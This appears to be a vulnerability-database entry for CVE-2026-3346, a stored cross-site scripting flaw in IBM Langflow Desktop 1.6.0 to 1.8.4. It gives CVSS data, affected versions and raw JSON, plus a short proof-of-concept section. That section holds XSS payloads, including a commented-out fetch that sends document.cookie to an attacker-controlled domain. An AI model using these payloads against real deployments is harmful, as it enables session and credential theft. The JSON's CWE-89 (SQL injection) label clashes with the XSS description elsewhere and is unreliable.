Security Vulnerability Report
CVE-2026-3346 CVSS 6.4 MEDIUM

CVE-2026-3346

Published: 2026-04-30 21:16:33
Last Modified: 2026-05-11 17:06:09

Description

IBM Langflow Desktop 1.6.0 through 1.8.4 is vulnerable to stored cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI, altering the intended functionality and potentially leading to credential disclosure within a trusted session.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:* - VULNERABLE
IBM Langflow Desktop 1.6.0
IBM Langflow Desktop 1.6.1
IBM Langflow Desktop 1.7.x
IBM Langflow Desktop 1.8.0
IBM Langflow Desktop 1.8.1
IBM Langflow Desktop 1.8.2
IBM Langflow Desktop 1.8.3
IBM Langflow Desktop 1.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC for CVE-2026-3346 (Stored XSS)
     Context: Inject into a vulnerable input field (e.g., Node Description) in IBM Langflow Desktop. -->
<script>
  // Simple Proof of Concept to demonstrate execution
  alert('CVE-2026-3346 XSS Triggered: ' + document.cookie);
  // Advanced payload: Exfiltrate session data to an external server
  // fetch('https://attacker-controlled-domain.com/collect?data=' + encodeURIComponent(document.cookie));
</script>
<!-- Alternatively, using an image tag to trigger requests without script blocks if filters are basic -->
<img src=x onerror="alert('XSS via Image Tag')">

References

https://www.ibm.com/support/pages/node/7271095 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-3346",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-30T21:16:32.610",
    "lastModified": "2026-05-11T17:06:09.163",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "IBM Langflow Desktop 1.6.0 through 1.8.4 Lanflow is vulnerable to stored cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.6.0",
                "versionEndIncluding": "1.8.4",
                "matchCriteriaId": "826FDA9F-F22A-49AC-96F1-7EDD14D90261"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.ibm.com/support/pages/node/7271095",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}